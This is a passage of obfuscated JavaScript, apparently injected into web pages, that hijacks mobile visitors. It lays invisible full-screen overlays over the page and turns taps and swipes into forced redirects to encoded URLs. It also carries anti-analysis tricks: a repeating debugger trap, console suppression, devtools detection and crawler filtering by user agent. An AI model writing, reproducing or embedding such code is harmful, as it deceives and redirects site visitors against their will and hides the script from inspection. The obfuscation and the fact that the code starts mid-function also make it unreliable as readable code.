a,t=v;H-G<e&&(a=(Date[t(475)]()-l)/1e3,n<a)&&(F++,l=Date[t(475)]())},!1),d=Date[v(475)](),f[v(459)](!1),sessionStorage[o]=JSON.stringify(f),setInterval(function(){var a=v,t=(Date[a(475)]()-d)/1e3,t=r<=t,e=i<=F,n=document[a(490)].offsetHeight>=s,t=t&&e&&n,e=(f[f[a(492)]-1]!==t&&(f[f.length-1]=t,sessionStorage[o]=JSON[a(480)](f)),f.filter(Boolean)[a(492)]),n=b<=e,t=!u||f[a(540)](Boolean),e=!c||f[0]&&f[a(540)](Boolean);n&&t&&e&&(sessionStorage[o+a(508)]=a(517))},1e3))}function J(a){return""===a?0:parseInt(a,10)}function K(a,t){var e=b6;return{classId:"config_"+a,i1:J(t.i1),i2:J(t.i2),i3:J(t.i3),i4:J(t.i4),i5:J(t.i5),i11:J(t.i11),i12:t[e(449)],i13:t[e(441)]}}function L(a,t){var e=b6;if(sessionStorage[a[e(518)]+e(508)])for(var n in t)n[e(528)]("r")&&typeof t[n]!==e(488)&&(t["k"+n[e(496)](1)]=t[n])}function M(a){p=a.m1,j=a.m2,n=a.m3}function N(a){var e,c=b6;null==sessionStorage[c(438)](c(507)+a)||(e=sessionStorage[c(438)](c(514)+a),I(e=K(a,a=JSON[c(501)](e))),M(a),L(e,a),v=parseInt(a.k2)>=T(1,100),w=parseInt(a.k1)>=T(1,100),x=parseInt(a.k3)>=T(1,100),e=((a,t,e,n)=>{var o=c,r={this_touch_status:!1,touch_min_height:0,touch_max_height:0,touchDelayTimeout:0};function i(a){var t=a0b,a=a[t(423)](","),a=a[a[t(492)]-1][t(423)]("_");r[t(429)]=parseInt(a[0]),r.touch_max_height=parseInt(a[1])}if(a){var s=a[o(423)](","),s=s[0]?parseInt(s[0]):100;if(100*Math[o(440)]()<s)return r[o(502)]=!0,i(a),r}if(e)for(var b=e[o(423)](",")[0][o(423)]("_"),u=0;u<b[o(492)];u++)if(parseInt(b[u])===n)return r[o(502)]=!0,i(e),r;if(t){a=t[o(423)](","),s=parseInt(a[0]),a=parseInt(a[1]);if(100*Math[o(440)]()<s)r[o(502)]=!0,r[o(498)]=a,i(t)}return r})(a[c(464)],a.k22,a[c(535)],q),A=e[c(502)],B=e[c(429)],C=e[c(505)],D=e.touchDelayTimeout,v||((e=t(a.k8,"_"))&&-1!==e[c(539)](q+"")?v=!0:w||((e=t(a.k7,"_"))&&-1!==e[c(539)](q+"")?w=!0:2===(e=t(a.k5,",")).length?parseInt(e[0])>=T(1,100)&&(v=!0,y=1e3*parseInt(e[1])):2===(e=t(a.k4,","))[c(492)]&&parseInt(e[0])>=T(1,100)&&(w=!0,y=1e3*parseInt(e[1])))),x)||((e=t(a.k9,"_"))&&-1!==e[c(539)](q+"")?x=!0:2===(e=t(a.k6,",")).length&&parseInt(e[0])>=T(1,100)&&setTimeout(function(){x=!0,al()},1e3*parseInt(e[1])))}document[b6(479)](b6(486),function(a){var t=b6,a=a.touches[0][t(536)];H=G=a},!1),document[b6(479)](b6(515),function(a){var t=b6,a=a[t(497)][0][t(536)],a=(H=H<a?a:H)-(G=a<G?a:G);E[t(428)](a)},!1),N(g);var O="",P=2,Q=(d+="?",c+="?",U(b6(550)));function R(a){for(var t=b6,e="",n=0;n<a;n++)e+=Math[t(437)](10*Math.random());return e}function S(a){for(var t=b6,e="",n=t(549),o=0;o<a;o++)e+=n.charAt(Math[t(437)](Math[t(440)]()*n[t(492)]));return e}function T(a,t){var e=b6;return Math.floor(Math[e(440)]()*(t-a+1))+a}function U(a){var t=b6;return a[t(423)]("")[t(451)]()[t(456)]("")}function V(a,t){for(var e=b6,n=[],o=0;o<a[e(492)];o+=t)n.push(a[e(496)](o,o+t));return n}function W(a,t){for(var e=b6,n="",o=0;o<t.length;o++)n+=t[o],o<t[e(492)]-1&&(n+=a);return n}function X(){var br=b6,aB=Date[br(501)](new Date)/1e3+"",aC=aB[br(439)](6,10),aD=Math[br(437)](9*Math[br(440)]())+1,aE=(aB*=aD,(aB+"")[br(492)]),aF=aD+""+aE+aB,aG={1:"+",2:"*"},aH=Math[br(437)](2*Math.random())+1,aI=Math[br(437)](998*Math[br(440)]())+1,aJ=Math[br(437)](998*Math[br(440)]())+1,aK=aI+aG[aH]+aJ,aL=(aI+"")[br(492)],aM=(aJ+"").length,aN=aC,aO=eval(aK)*aN+"2",aP=aH+""+aL+aM+aI+aJ+aO,aQ=aF+aP;return aQ}function Y(){for(var a=b6,t=(g+"")[a(423)](""),e=t[a(492)],n=[e],o=[],r=0;r<10;r++){var i=Math[a(437)](9*Math[a(440)]())+1;o[r]=i}for(var s=[0,1,2,3,4,5,6,7,8,9],r=1;r<s.length;r++){var b=Math[a(437)](Math[a(440)]()*(r+1));[s[r],s[b]]=[s[b],s[r]]}for(r=0;r<e;r++){var u=s[r];o[u]=t[r],n[r+1]=u}return n[a(456)]("")+o[a(456)]("")}function Z(){var a=b6,a=Y()+X()+(new Date)[a(477)]()+"";return O=a}function a0(){for(var t=b6,e=[233280,9301,49297,714025,4096,150889,134456,281,28411,7875,421,1663,14406,967,3041,214326,3613,45289],n=new Date(Date[t(475)]()-b),o="",r=n.getMonth()+1,i=n[t(499)](),s=""+n[t(529)](),s=(s+=r<=9?"0"+r:r)+(i<=9?"0"+i:i)+a,u=0;u<6;u++)o+=(0,String[t(478)])(97+(parseInt(s)*e[3*u+1]+e[3*u+2])%e[3*u]%26);return o}function a1(a,t){for(var e=b6,n="",o=0;o<a[e(492)];o++){var r=a[e(467)](o);48<=r&&r<=57&&(r=(r-48+t)%10+48),n+=String[e(478)](r)}return n}function a2(a){var t=b6,a=a1(a,5),t=a[t(492)];return t<10?t="00"+t:t<100&&(t="0"+t),t+a}var a3=location[b6(554)],a4=navigator,a6,a7,a8,a9,aa,ab,ac,ad,ae,af,ag,ah,ai,aj,ak,am,an,ao,ap,aq,ar,as,at,au,av,aw,ax,ay,az,az,aA,aA;function a5(){var a=b6,t=-1!=a4[a(483)][a(539)]("Win"),e=-1!=a4[a(483)][a(539)]("Mac");a4[a(483)];return(t=-1==a3.indexOf("vv")&&t)||e}function al(){var bB=b6;x&&!window[bB(463)]&&(window[bB(463)]=!0,P=3,eval(ab)())}a5()||(a6=document,a7="h"+U(b6(526))+"/",a8="0",a9=S(11),aa=S(10),ab=S(10),ac=S(10),ad=S(7),ae=T(2147483547,2147483647),af=ae-T(1e4,2e4),ag=T(115,122),ah=function(){},ai=b6(531),aj=b6(520),v?(ai=b6(447),aj=b6(541),a8="1",P=3,ah=function(a){var t=b6;a.style["z-in"+t(551)]=af}):w&&(ai=p+"vh",aj=b6(541),a8="2",P=4,ah=function(a){var t=b6;a.style["z-in"+t(551)]=af}),ak=Date[b6(475)](),E[b6(428)]=function(aB){var bA=b6;if(A){if(0!=D){var aC=new Date(ak)[bA(477)](),aD=(Date[bA(475)]()-aC)/1e3;if(aD<D)return}B<aB&&aB<=C&&(P=3,eval(ab)())}},am="",an=b6(548),ao=b6(553),ap="bottom",aq="",ar=b6(458),1==h&&(an=b6(487),am="padding-top:32%;",i==b6(442)&&(am=b6(466),ao=b6(442),ap=b6(442),ar="padding-bottom"),ae=T(8e4,9e4)),an=V(an,2),an=W(b6(506),an),an='"'+an+'"',ao=V(ao,1),ao=W(b6(506),ao),ao='"'+ao+'"',ap=V(ap,1),ap=W(b6(506),ap),ap='"'+ap+'"',as="",at="","yes"==j&&(as=U(b6(436)),at=U(b6(450))),au=T(100,200),av=au+200,aw=y+av+100,ax=aw+300,ay=ax+300,az=function(){},u&&(a8+="3",az=function(){var bE=b6,aB=function(aD){var bC=a0b,aE=document[bC(433)](bC(490)),aF=document[bC(433)](aD),aG=aF.offsetHeight,aH=aC(aF),aI=aH+aG,aJ=!0;function aK(aL){var bD=bC,aM=aL[bD(497)][0],aN=aM[bD(536)],aO=aM[bD(472)],aP=0,aP=1!=h?aM[bD(472)]:aM.clientY;aH<=aP&&aP<aI&&aJ&&(P=4,eval(ab)(!1))}aE[bC(479)](bC(515),aK)};function aC(a){for(var t=bE,e=a[t(470)],n=a[t(448)];null!==n;)e+=n[t(470)],n=n[t(448)];return e}setTimeout(function(){aB("."+ad)},ax),ai!=bE(531)&&"100vh"!=ai&&setTimeout(function(){aB("."+a9)},ax+50)}),aA=function(){},aA=k==b6(443)?function(a){var t=b6,e=(a[t(431)][t(446)](),document[t(455)](a9));if(e)for(var n=0;n<e[t(492)];n++)e[n][t(495)][t(542)]="0";document[t(545)](t(490))[0][t(495)][""+ar]=t(544),event.stopPropagation()}:function(aB){var bH=b6;event[bH(512)](),eval(ab)()},function(){var bK=b6,aB={data3:{0:{wdf:a7+a0()+Q+c+Z()}}},aC=function(a){var t=a0b;return a.split("")[t(451)]()[t(456)]("")};function aD(){return a7+a0()+Q+d+a2(O)+P+X()}window[aa]=function(a){aA(a)},window[ab]=function(a){var t=a0b,e=document[t(455)](a9);if(e&&null==a)for(var n=0;n<e[t(492)];n++)e[n][t(495)][t(542)]="0";window.location[t(554)]=aD()},al(),x&&!window.temp&&(window[bK(463)]=!0,P=3,eval(ab)());var aE=function(){var a=bK;window[a(484)][a(554)]=aD()},aF=aC(aB[bK(555)][0][bK(547)]),aG="",aH=(a8=" ",aG+=as+bK(462)+ad+bK(476)+a8+bK(503)+bK(522),aG+=bK(435)+a9+bK(471),document[bK(426)](bK(461)+am+"}#"+ac+'{display:flex;width:100%;}</style><div id="'+ac+bK(546)),document[bK(426)](bK(538)),setTimeout(function(){var a=bK;document[a(434)+"E"+a(454)+"yId"](ac)[a(482)]=aG},au),setTimeout(function(){function aI(aJ,aK,aL){var bN=a0b,aM=document[bN(455)](aJ)[0];aM.style[bN(516)+bN(444)]=ag+"px",aM.style[eval(ao)]="0",aM.style.left="0",aM.style["ani"+bN(513)+"on"]=at,aM.style["z-in"+bN(551)]=ae,aM.style["w"+bN(473)]=bN(541),aM[bN(482)]+="<i"+bN(489)+"yl"+bN(452)+"th:100%;h"+bN(427)+bN(474)+ag+"p"+bN(521)+bN(527)+U(aK)+'" />',aM[bN(482)]=aM[bN(482)]+aq,aM["on"+bN(523)+"ck"]=function(){P=2,aL()},aM.style[bN(494)+"it"+bN(511)]=eval(an)}aI(ad,aF,aE)},av),setTimeout(function(){var bO=bK,aI=document[bO(455)](a9)[0];aI.style[bO(530)+bO(524)+bO(444)]=ai,aI.style.width=aj,ah(aI),aI.style[eval(ap)]="0",aI.style.left="0",aI["on"+bO(523)+"ck"]=function(){eval(ab)()}},aw),az(),sessionStorage[bK(438)](bK(507)+g));null==aH&&r()}())}()})(),console.log("B2_DJ")};;;;window._PC_ZS=function(){window.localStorage,console.log("PC_ZS")},window._HM_ZS=window._PC_ZS;;function store(key,val,day){if(void 0!==window.localStorage)if(1<arguments.length){day=day||360;var obj={val:val,exp:(new Date).getTime()+43200*day};window.localStorage.setItem(key,JSON.stringify(obj))}else{var data=window.localStorage.getItem(key);if(data){try{data=JSON.parse(data)}catch(e){data=eval("("+data+")")}(void 0===data.exp||data.exp>=(new Date).getTime())&&data.val}}else 1<arguments.length?setCookie(key,val,day):getCookie(key)}"undefined"==typeof console&&(window.console={log:function(){}}),-1<location.href.indexOf("LDA")&&alert("LDA"),!function(f,d,h){(new Date).getHours();function r(e,t,n){n=n||1;var o=new Date;o.setTime(o.getTime()+12*n*60*60*1e3),d.cookie=e+"="+escape(t)+";path=/;expires="+o.toGMTString()}function i(e){var e=new RegExp("(^| )"+e+"=([^;]*)(;|$)");return(e=d.cookie.match(e))?unescape(e[2]):null}n=this,e=function(e){function c(e){return~h.userAgent.toLowerCase().indexOf(e)}function r(e,t){t!==u?location.href=e:location.replace(e)}var a=function(){return(a=Object.assign||function(e){for(var t,n=1,o=arguments.length;n<o;n++)for(var r in t=arguments[n])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)},s={clear:!0,debug:!0,debugTime:3e3},u=2,o=0,i=0,l=function(e){var t=0,n=1<<o++;return function(){(!i||i&n)&&2==++t&&(i|=n,e(),t=1)}},t=(n.prototype.clear=function(){this._clear&&(console.clear=function(){})},n.prototype.debug=function(){var e;this._debug&&(e=new Function("debugger"),setInterval(e,this._debugTime))},n.prototype.redirect=function(e){var t,n,o=this._redirect;o&&(0!==o.indexOf("http")?(n=location.pathname+location.search,((t=o)?"/"!==t[0]?"/".concat(t):t:"/")!==n&&r(o,e)):location.href!==o&&r(o,e))},n.prototype.callback=function(){if((this._callback||this._redirect||this._write)&&f){var e=this.fire.bind(this),t=f.chrome||c("chrome"),n=c("firefox");if(!t)return n?((t=/./).toString=e,void console.log(t)):(a=e,n=new Image,Object.defineProperty(n,"id",{get:function(){a(u)}}),void console.log(n));(r=/./).toString=l(t=e),o.toString=l(t),(n=new Date).toString=l(t),console.log("%c",o,r,n),i=l(t),n=new Error,Object.defineProperty(n,"message",{get:function(){i()}}),console.log(n)}function o(){return r}var r,i,a},n.prototype.write=function(){var e=this._write;e&&(d.body.innerHTML="string"==typeof e?e:e.innerHTML)},n.prototype.fire=function(e){this._callback?this._callback.call(null):(this.redirect(e),this._redirect||this.write())},n.prototype.ban=function(){this.callback(),this.clear(),this.debug()},n);function n(e){var e=a(a({},s),e),t=e.clear,n=e.debugTime,o=e.callback,r=e.redirect,i=e.write;this._debug=e.debug,this._debugTime=n,this._clear=t,this._callback=o,this._redirect=r,this._write=i}e.init=function(e){new t(e).ban()},Object.defineProperty(e,"__esModule",{value:!0})},"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((n="undefined"!=typeof globalThis?globalThis:n||self).CB={});var t,e=/\bad=(\w+)/,n=(-1<location.search.search(e)&&(t="_"+location.search.match(e)[1],Object.keys(ac).forEach(function(e){-1<e.search(/2/)||(ac[e]=-1<ac[e].indexOf(t)?[t]:[],ac[e.replace(/1/,"2")]=0<ac[e].length?[100]:[])}),console.log(ac)),"_"+String.fromCharCode(66)+"J"+String.fromCharCode(83)),e=(-1==(location.href+(d.cookie||"")).search(new RegExp(n,""))&&CB.init({redirect:"/?FROM=bjs&u="+n.substr(1)}),((e,t)=>{var n="";e=decodeURIComponent(e);for(var o=0;o<e.length;o++)n+=String.fromCharCode(t.charCodeAt(o%t.length)^e.charCodeAt(o));return n})("N869FU@0D\r\f\tN\r\t\n\t\n\t\t\f\\F\t\n\vFP[\n\v\t\fB\n\v\f\t\r\t!\b\t\\","fkyou")),n=new RegExp(e,"ig").test(h.userAgent);var a=("ontouchstart"in f||0<h.maxTouchPoints||0<h.msMaxTouchPoints)&&!n,c=null;C([105,109,112,111,114,116,97,110,116]);function o(e,n,o){return e.forEach(function(t,e){o.push({func:function(){"string"==typeof t&&(f._TJEX=f._TJEX||[],f._TJEX.push(t),t=f[t]);try{t&&t()}catch(e){console.log("funcerr",t)}},weight:n[e]})}),o}var e=ac.ZS1||[],n=ac.DJ1||[],s=ac.DJ2||[],u=ac.PC1||[],l=ac.PC2||[],e=o(e,ac.ZS2||[],[]),n=o(n,s,[]),s=o(u,l,[]);function g(e,t){if(!t)return[];for(var n=e.filter(function(e){return!e.disable}),o=0,r=0;r<n.length;r++)o+=n[r].weight,n[r].max=o;for(var i,a=Math.round(Math.random()*(o-1)),c=[],r=0;r<n.length;r++)if(a<n[r].max){c.push(n[r]),1<=--t&&(n.splice(r,1),i=g(n,t))&&c.push.apply(c,i);break}return c}var p=g(n,2),v=g(e,1),m=g(s,1);function y(e,t){try{e.func()}catch(e){console.log(t,e)}}("undefined"!=typeof CAD&&0<CAD||"undefined"!=typeof COOKIE_PRE&&i(COOKIE_PRE+"auth"))&&(v=[],p=[]);for(var b,_=1;_<=2;_++){var w="A"+_+"_",O="z"+(1e4*_+Math.round(Math.random()+1e4));f[w]=O,f[O]=function(e){var t,n,o;return a?(null==c&&((o=i(t=COOKIE_PRE+"_ac"))||r(t,o="r"+~~(9999*Math.random()),60),c=~~i(COOKIE_PRE+o),r(COOKIE_PRE+o,++c,1)),t=c,o=new RegExp("(google|baidu)\\.com","ig"),n=-1<d.referrer.search(o),0<p.length&&y(p.shift(),2),!(n&&t<=1||50<=t)&&void(e||0<v.length&&y(v.shift(),3))):(0<m.length&&y(m.shift(),1),!1)}}function C(e){for(var t="",n=0;n<e.length;n++)t+=String.fromCharCode(e[n]);return t}function T(e){return function(){try{e()}catch(e){b[e.message]||(b[e.message]=1,console.log(e))}}}f.sTimeout=setTimeout,f.sInterval=setInterval,b={},f.setTimeout=function(e,t){return f.sTimeout(T(e),t<500?1e3:t)},f.setInterval=function(e,t){return f.sInterval(T(e),t<500?1e3:t)}}(window,document,navigator)};(()=>{var _;(new Date).getHours(),_={ZS1:["_BD_ZS"],ZS2:[50],DJ1:["_BD_DJ","_B2_DJ"],DJ2:[50,50],PC1:["_HM_ZS"],PC2:[100]},lrgivhcs(window,document,navigator,_)})();;//232156-qc2/*ba7f61bdf0fba40c96d215e40b6bb8ca20503*/